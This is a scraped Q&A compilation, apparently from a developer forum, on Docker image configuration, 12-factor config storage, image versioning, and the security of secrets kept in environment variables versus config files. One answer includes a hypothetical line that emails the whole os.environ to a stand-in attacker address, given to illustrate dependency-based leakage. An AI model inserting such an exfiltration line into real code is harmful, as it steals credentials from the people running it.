Creating a Docker UAT/Production image

Creating a Docker UAT/Production image - docker

Just a quick question about best practices on creating Docker images for critical environments. As we know in the real world, often times the team/company deploying to internal test is not the same as who is deploying to client test environments and production. There becomes a problem because all app configuration info may not be available when creating the Docker UAT/production image e.g. with Jenkins. And then there is the question about passwords that are stored in app configuration.
So my question is, how "fully configured" should the Docker image be? The way I see it, it is in practice not possible to fully configure the Docker image, but some app passwords etc. must be left out. But then again this slightly defies the purpose of a Docker image?

how "fully configured" should the Docker image be? The way I see it, it is in practice not possible to fully configure the Docker image, but some app passwords etc. must be left out. But then again this slightly defies the purpose of a Docker image?
There will always be tradeoffs between convenience, security, and flexibility.
An image that works with zero runtime configuration is very convenient to run but not very flexible and sensitive config like passwords will be exposed.
An image that takes all configuration at runtime is very flexible and doesn't expose sensitive info, but can be inconvenient to use if default values aren't provided. If a user doesn't know some values they may not be able to use the image at all.
Sensitive info like passwords usually land on the runtime side when deciding what configuration to bake into images and what to require at runtime. However, this isn't always the case. As an example, you may want to build test images with zero runtime configuration that only point to test environments. Everyone has access to test environment credentials anyways, zero configuration is more convenient for testers, and no one can accidentally run a build against the wrong database.
For configuration other than credentials (e.g. app properties, loglevel, logfile location) the organizational structure and team dynamics may dictate how much configuration you bake in. In a devops environment making changes and building a new image may be painless. In this case it makes sense to bake in as much configuration as you want to. If ops and development are separate it may take days to make minor changes to the image. In this case it makes sense to allow more runtime configuration.
Back to the original question, I'm personally in favor of choosing reasonable defaults for everything except credentials and allowing runtime overrides only as needed (convention with reluctant configuration). Runtime configuration is convenient for ops, but it can make tracking down issues difficult for the development team.

Related

Growing local development environment issues

Where I work we've been adding microservices for different purposes and the local development environment is becoming difficult to setup. Services have too many environment variables to configure and usually there's not enough memory avaiable to run them.
We plan to fix these issues. I understand it's a matter of architecture and DevOps mostly. One way we've thought of is to create a proper service registry that allows easier setup and opens the door to, for example, have some services running locally and others in the cloud. All wired together with the service registry.
Another option could be to stub some of the dependencies with something like https://wiremock.org/ but it seems too limited and difficult (?).
I wanted to ask, what other strategies are there to manage growing development environments?

Are the problems with using a big Docker container for multiple tasks?

I'm working on a scientific computing project. For this work, I need many Python modules as well as C++ packages. The C++ packages require specific versions of other software, so setting up the environment should be done carefully, and after the setup the dependencies should not be updated. So, I thought it should be good to make a Docker container and work inside it, in order to make the work reproducible in the future. However, I didn't understand why people in the internet recommend to use different Docker containers for different processes. For me it seems more natural that I setup the environment, which is a pain, and then use it for the entire project. Can you please explain what I have to be worried about in this case?

It's important that you differentiate between a Docker image and a Docker container.
People recommend using one process per container because this results in a more flexible, scalable environment: if you need to scale out your frontend web servers, or upgrade your database, you can do that without bringing down your entire stack. Running a single process per container also allows Docker to manage those processes in a sane fashion, e.g. by restarting things that have unexpectedly failed. If you're running multiple processes in a container, you end up having to hide this information from Docker by running some sort of process manager, which complicates your containers and can make it difficult to orchestrate a complex application.
On the other hand, it's quite common for someone to use a single image as the basis for a variety of containers all running different services. This is particularly true if you're build a project where a single source tree results in several commands; in that case, it makes sense to have bundle that all into a single image, and then choose which command to run when you start the container.
The only time this becomes a problem is when someone decides to do something like bundle, say, MySQL and Apache into a single image: which is a problem because there are already well maintained official images for those projects, and by building your own you've taking on the burden of properly configuring those services and maintaining the images going forward.
To summarize:
One process/service per container tends to make your life easier
Bundling things together in a single image can be okay

What's the process of storing config for 12 factor app?

so I have been building my application mostly as 12 factor app and now looking at the config part.
Right now as it stands I have separate config files for dev and production and through the build process we either build a dev or production image. The code is 100% the same the only thing that changes is the config.
Now I 100% understand that in a 12 factor app the config should come from external source such as: environment variables, or maybe a safe store like vault etc...
So what the various articles and blogs fail to mention about the config is the how is the config stored/processed. If the code is separated in it's own git repo and it has no config stored with it then how do we handle the config?
Do we store the actual config values on a separate git and then some how merge/push/execute those on the target environment (Kubernet config map, marathon JSON config, Vault, etc...) through the build process using some kind of trigger?

There is not a standard but what I've been observing is some common behaviors like:
Sensitive information never gets on versioning system, specially git which is a DCVS (you can clone the repo for other locations). If you don't follow, remember that our existing "security system" is based on the incapacity of read crypto info in a certain time, but in certain point you might be able to read the info. Usually on kubernetes I see operators, managing the service account across multiple namespaces and then other only referring the service account, tools like KMS, Cert manager, Vault and etc. are welcome
Configuration like env vars, endpoints, are stored and versioned with their own "lifecycle".
12factor does not meant to separate the configuration of your app from your repository, instead suggest not to put into your app (like on your container or even binary distribution).
In fact if you want to use a separate repo only for config you can do it, but if you want to put aside your project source code the configuration, you can do it as well. It is more a decision based on the size of the project, complexity, segregation of duties and team context. (IMHO)
On my case of study for instance, makes sense to separate config on a dedicated repository as production environment has more than 50 cluster, which one with their own isolation stack, also there are different teams managing their own services and using common backing services (db, api, streams...). In my opinion as long as things gets more complex and cross-shared, makes more sense to separate config on independent repository, as there are several teams and resources over multiple clusters.

Managing Docker images over time

Folks that are building Docker images on push - how do you manage the different versions over time?
Do they all get their own tag? Do you tag based on the git hash?
Do you delete old images after some time? Don't they take up a lot of space (1GB+) each?

how do you manage the different versions over time?
The first thing to note is tags can't be trusted over time. They are not guaranteed to refer to the same thing or continue to exist so use Dockerfile LABEL's which will remain consistent and always be stored with the image. label-schema.org is a good starting point.
Do they all get their own tag? Do you tag based on the git hash?
If you need something unique to refer to every build with, just use the image sha256 sum. If you want to attach extra build metadata to an image, use a LABEL as previously mentioned and include the git hash and whatever versioning system you want. If using the sha256 sum sounds hard, tags are still needed to refer to multiple image releases so you will need some system.
Git tags, datetimes, build numbers all work. Each have their pros and cons depending on your environment and what you are trying to tie together as a "release". It's worthwhile to note that a Docker image might come from a Dockerfile with a git hash, but building from that git hash will not produce a consistent image over time, if you source an image FROM elsewhere.
Do you delete old images after some time?
Retention entirely depends on your software/systems/companies requirements or policy. I've seen environments where audit requirements have been high which increases build/release retention time, down to the "I want to re run these tests on this build" level. Other environments have minimal audit which tends to drop retention requirements. Some places don't even try to impose any release management at all (this is bad). This can't really be answered by someone out here for your specific environment, there are minimums though that would be a good idea to stick to.
The base requirement is having an artefact for each production release stored. This is generally "forever" for historical purposes. Actively looking back more than a release or two is pretty rare (again this can depend on your app), so archival is a good idea and easy to do with a second registry on cheap storage/hosting that is pushed a copy of everything (i.e. not on your precious ssd's).
I've never seen a requirement to keep all development builds over time. Retention generally follows your development/release cycle. It's rare you need access to dev builds out of your current release + next release. Just remember to LABEL + tag dev builds appropriately so clean up is simple. -dev -snapshot -alpha.0 whatever.
Don't they take up a lot of space (1GB+) each?
It's normally less than you think but yes they can be large as on top of your application you have an OS image. That's why lots of people start with alpine as it's tiny compared to most distros, as long as you don't have anything incompatible with musl libc.

Is it secure to store passwords as environment variables (rather than as plain text) in config files?

I work on a few apps in rails, django (and a little bit of php), and one of the things that I started doing in some of them is storing database and other passwords as environment variables rather than plain text in certain config files (or in settings.py, for django apps).
In discussing this with one of my collaborators, he suggested this is a poor practice - that perhaps this isn't as perfectly secure as it might at first seem.
So, I would like to know - is this a secure practice? Is it more secure to store passwords as plain text in these files (making sure, of course, not to leave these files in public repos or anything)?

As mentioned before, both methods do not provide any layer of additional "security" once your system is compromised. I believe that one of the strongest reasons to favor environment variables is version control: I've seen way too many database configurations etc. being accidentially stored in the version control system like GIT for every other developer to see (and whoops! it happened to me as well ...).
Not storing your passwords in files makes it impossible for them to be stored in the version control system.

On a more theoretical level, I tend to think about levels for security in the following ways (in order of increasing strength) :
No security. Plain text. Anyone that knows where to look, can access the data.
Security by Obfuscation. You store the data (plaintext) someplace tricky, like an environment variable, or in a file that is meant to look like a configuration file. An attacker will eventually figure out what's going on, or stumble across it.
Security provided by encryption that is trivial to break, (think caesar cipher!).
Security provided by encryption that can be broken with some effort.
Security provided by encryption that is impractical to break given current hardware.
The most secure system is one that nobody can use! :)
Environment variables are more secure than plaintext files, because they are volatile/disposable, not saved;
i.e. if you set only a local environment variable, like "set pwd=whatever," and then run the script,
with something that exits your command shell at the end of the script, then the variable no longer exists.
Your case falls into the first two, which I'd say is fairly insecure. If you were going to do this, I wouldn't recommend deploying outside your immediate intranet/home network, and then only for testing purposes.

Anytime you have to store a password, it is insecure. Period. There's no way to store an un-encrypted password securely. Now which of environment variables vs. config files is more "secure" is perhaps debatable. IMHO, if your system is compromised, it doesn't really matter where it's stored, a diligent hacker can track it down.

Sorry I didn't have enough rep to comment, but I also wanted to add that if you're not careful, your shell might capture that password in it's command history as well. So running something like $ pwd=mypassword my_prog manually isn't as ephemeral as you might have hoped.

I think when possible you should store your credentials in a gitignored file and not as environment variables.
One of the things to consider when storing credentials in ENV (environment) variables vs a file is that ENV variables can very easily be inspected by any library or dependency you use.
This can be done maliciously or not. For example a library author could email stack traces plus the ENV variables to themselves for debugging (not best practice, but it's possible to do).
If your credentials are in a file, then peaking into them is much harder.
Specifically, think about an npm in node. For an npm to look at your credentials if they are in the ENV is a simple matter of process.ENV. If on the other hand they are in a file, it's a lot more work.
Whether your credentials file is version controlled or not is a separate question. Not version controlling your credentials file exposes it to fewer people. There's no need for all devs to know the production credentials. Since this lives up to the principle of least privilege, I would suggest git ignoring your credentials file.

It depends on your threat model.
Are you trying to prevent your users from sprinkling passwords all over their file systems where they are likely to be forgotten and mishandled? If so, then yes, because environmental variables are less persistent than files.
Are you trying to secure against something malicious that is directly targeting your program? If so, then no, because environment variables do not have the same level of access control that files do.
Personally, I think that negligent users are more common than motivated adversaries, so I'd go with the environment variable approach.

Among others, an issue with using environment variables to store secrets is that they can be leaked unintentionally:
Messy code displaying raw error messages with context (env vars) to a user
Monitoring tool capturing the error and context and sending/storing it for future investigation
Developer logging environment variables which persists them to disk (and potentially to some log processing tool e.g. Logstash)
Compromised dependency sending all of the global variables it can reach, including env vars to the attacker
Setting the env variable leaving traces in the shell history
Potential issues with secrets stored in config files:
Misconfigured file permissions allowing access to a random OS user
Developer adding config files to version control
Intentionally (not knowing it's bad)
By accident. Even when the file is removed (during a PR review maybe), if not done properly, it may still live in the Git commit history.
Irrelevant to the way you store secrets, if your system is compromised you're screwed. Extracting those is just a matter of time and effort.
So what can we do to minimize the risks?
Don't store/pass around secrets in plain text.
One way to approach the problem is to use an external (managed or self-hosted) secrets storage solution (e.g. AWS Parameter Store, Azure Vault, Hashicorp Vault) and fetch sensitive data at runtime (possibly caching in memory). This way your secrets are encrypted in transit and at rest.

AFAICT, there are two reasons people recommend storing secrets in environment variables:
It's too easy to inadvertently commit secret flat files to a repo. (And if it's a public repo, you're toast.)
It prevents password clutter i.e., having the same key in many different project directory files is itself a security risk since developers will eventually lose track of where secrets are located.
These two issues can be solved in better ways. The former should be solved by a git commit hook that checks for things that look like passwords (e.g., gitleaks). I wish Linus built such a tool into the git library's source code but, alas, that didn't happen. (Needless to say, secret files should always be added to .gitignore, but you need a hook in case someone forgets to do so.)
The latter can be solved by having a global company secrets file, which is ideally stored on a read-only shared drive. So, in Python, you could have something like from company_secrets import *.
More importantly, as pointed out by others, it's way too easy to hack secrets stored in environment variables. For example, in Python, a library author could insert send_email(address="evil.person#evil.com", text=json.dumps(os.environ)) and then you're toast if you execute this code. Hacking is much more challenging if you have a file on your system called ~/secret_company_stuff/.my_very_secret_company_stuff.
Django users only:
Django (in DEBUG mode) shows the raw value of an environment variable in the browser if there is an exception (in DEBUG mode). This seems highly insecure if, for example, a developer accidentally sets DEBUG=True in production. In contrast, Django DOES obfuscate password settings variables by looking for the strings API, TOKEN, KEY, SECRET, PASS or SIGNATURE in the framework's settings.py file's variable names.

Develop Reference

ios ruby-on-rails asp.net-mvc docker delphi jenkins grails google-sheets machine-learning dart